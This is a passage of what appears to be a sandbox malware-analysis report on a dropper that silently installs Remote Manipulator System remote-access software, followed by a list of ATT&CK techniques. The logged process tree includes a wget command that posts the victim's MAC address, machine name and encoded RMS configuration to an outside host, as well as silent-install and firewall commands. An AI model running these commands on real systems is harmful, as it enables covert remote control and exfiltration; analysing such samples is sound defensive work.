        ping -n 10 127.0.0.1
        5⤵
        Runs ping.exe
        
        PID:1952
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Reg Query "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters"|Find /I "Options"
        5⤵
        
        PID:4092
      - C:\Windows\SysWOW64\reg.exe
        
        Reg Query "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters"
        6⤵
        
        PID:1192
      - C:\Windows\SysWOW64\find.exe
        
        Find /I "Options"
        6⤵
        
        PID:2348
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c getmac|Find /I "Tcpip"
        5⤵
        
        PID:2220
      - C:\Windows\SysWOW64\getmac.exe
        
        getmac
        6⤵
        
        PID:4000
      - C:\Windows\SysWOW64\find.exe
        
        Find /I "Tcpip"
        6⤵
        
        PID:3428
    - - C:\Users\Admin\AppData\Local\Temp\wget.exe
        
        wget --post-data="mac=76-BA-EE-31-78-4E&comp=MHKKHUYI&id=545046301154524F4D5365727665724F7074696F6E7300095573654E5441757468080D53656375726974794C6576656C020304506F727403121614456E61626C654F7665726C617943617074757265080C53686F775472617949636F6E080642696E644950060D416E7920696E746572666163651343616C6C6261636B4175746F436F6E6E656374091743616C6C6261636B436F6E6E656374496E74657276616C023C084869646553746F70090C497046696C7465725479706502021750726F7465637443616C6C6261636B53657474696E6773081550726F74656374496E6574496453657474696E6773080F446F4E6F7443617074757265524450080755736549507636091141736B557365725065726D697373696F6E0816557365725065726D697373696F6E496E74657276616C031027134175746F416C6C6F775065726D697373696F6E08134E656564417574686F72697479536572766572081F41736B5065726D697373696F6E4F6E6C794966557365724C6F676765644F6E080A496E7465726E657449640614532D45464244464346342D464333462D3433413411557365496E6574436F6E6E656374696F6E0913557365437573746F6D496E6574536572766572080A496E65744964506F72740317160D557365496E6574496449507636081444697361626C6552656D6F7465436F6E74726F6C081344697361626C6552656D6F746553637265656E081344697361626C6546696C655472616E73666572080F44697361626C655265646972656374080D44697361626C6554656C6E6574081444697361626C6552656D6F746545786563757465081244697361626C655461736B4D616E61676572080E44697361626C654F7665726C6179080F44697361626C6553687574646F776E081444697361626C6552656D6F746555706772616465081544697361626C655072657669657743617074757265081444697361626C654465766963654D616E61676572080B44697361626C6543686174081344697361626C6553637265656E5265636F7264081044697361626C65415643617074757265081244697361626C6553656E644D657373616765080F44697361626C655265676973747279080D44697361626C65415643686174081544697361626C6552656D6F746553657474696E677308144E6F746966794368616E67655472617949636F6E08104E6F7469667942616C6C6F6E48696E74080F4E6F74696679506C6179536F756E6408064C6F6755736508055369644964061034313735392E36383938343339353833084C6963656E73657306C2524D532D5A2D36414233383733313239626646373830303843323145666633453845434564616269593253326459586C52664477776E4932315756305A65586C39515643467866456457447778655241395749436732625674645555464457464E75596A39474267315A56673445416D5A2B61674145486C6C57446731554A6E4E6942785542424238434151466D456D49424167414243415548444830704A777745556C354744674141626D4977584577504442316256456B4E4A4431555677383D0D50726F787953657474696E67731426010000EFBBBF3C3F786D6C2076657273696F6E3D22312E302220656E636F64696E673D225554462D3136223F3E0D0A3C70726F78795F73657474696E67732076657273696F6E3D223532313030223E3C7573655F70726F78793E66616C73653C2F7573655F70726F78793E3C70726F78795F747970653E303C2F70726F78795F747970653E3C686F73743E3C2F686F73743E3C706F72743E383038303C2F706F72743E3C6E6565645F617574683E66616C73653C2F6E6565645F617574683E3C6E746D6C5F617574683E66616C73653C2F6E746D6C5F617574683E3C757365726E616D653E3C2F757365726E616D653E3C70617373776F72643E3C2F70617373776F72643E3C646F6D61696E3E3C2F646F6D61696E3E3C2F70726F78795F73657474696E67733E0D0A1144697361626C65496E7465726E65744964080000&group=download" "http://rms.admin-ru.ru/updater.php" -q -O -
        5⤵
        Executes dropped EXE
        
        PID:3728
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 3 127.0.0.1
        5⤵
        Runs ping.exe
        
        PID:3952
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
      4⤵
      PID:648

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:432
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 14B7B4596FA45B7BCF74D202BD8A2D13
  2⤵
  - Loads dropped DLL
  PID:4060
- C:\Windows\SysWOW64\sysfiles\rfusclient.exe
  "C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /silentinstall
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Modifies data under HKEY_USERS
  PID:2848
- - C:\Windows\SysWOW64\sysfiles\rutserv.exe
    "C:\Windows\SysWOW64\sysfiles\rutserv.exe" /silentinstall
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:3968
- C:\Windows\SysWOW64\sysfiles\rfusclient.exe
  "C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /firewall
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Modifies data under HKEY_USERS
  PID:64
- - C:\Windows\SysWOW64\sysfiles\rutserv.exe
    "C:\Windows\SysWOW64\sysfiles\rutserv.exe" /firewall
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    PID:684
- C:\Windows\SysWOW64\sysfiles\rfusclient.exe
  "C:\Windows\SysWOW64\sysfiles\rfusclient.exe" /server /start
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Modifies data under HKEY_USERS
  PID:3900
- - C:\Windows\SysWOW64\sysfiles\rutserv.exe
    "C:\Windows\SysWOW64\sysfiles\rutserv.exe" /start
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    PID:744

C:\Windows\SysWOW64\sysfiles\rutserv.exe
C:\Windows\SysWOW64\sysfiles\rutserv.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1380
- C:\Windows\SysWOW64\sysfiles\rfusclient.exe
  C:\Windows\SysWOW64\sysfiles\rfusclient.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  PID:688
- - C:\Windows\SysWOW64\sysfiles\rfusclient.exe
    C:\Windows\SysWOW64\sysfiles\rfusclient.exe /tray
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: SetClipboardViewer
    PID:3360
- C:\Windows\SysWOW64\sysfiles\rfusclient.exe
  C:\Windows\SysWOW64\sysfiles\rfusclient.exe /tray
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:408

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Impair Defenses

T1562

Credential Access

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

memory/64-402-0x0000000002390000-0x0000000002391000-memory.dmp

Filesize
4KB

Download
memory/408-432-0x0000000000920000-0x0000000000A6A000-memory.dmp

Filesize
1.3MB

Download
memory/684-403-0x0000000000A70000-0x0000000000BBA000-memory.dmp

Filesize
1.3MB

Download
memory/688-433-0x00000000009B0000-0x0000000000AFA000-memory.dmp

Filesize
1.3MB

Download
memory/744-430-0x0000000000A30000-0x0000000000B7A000-memory.dmp

Filesize
1.3MB

Download
memory/1380-431-0x00000000001E0000-0x00000000001E1000-memory.dmp

Filesize
4KB

Download
memory/2848-391-0x0000000000870000-0x000000000091E000-memory.dmp

Filesize
696KB

Download
memory/3900-429-0x00000000009E0000-0x00000000009E1000-memory.dmp

Filesize
4KB

Download
memory/3968-394-0x0000000000AF0000-0x0000000000AF1000-memory.dmp

Filesize
4KB

Download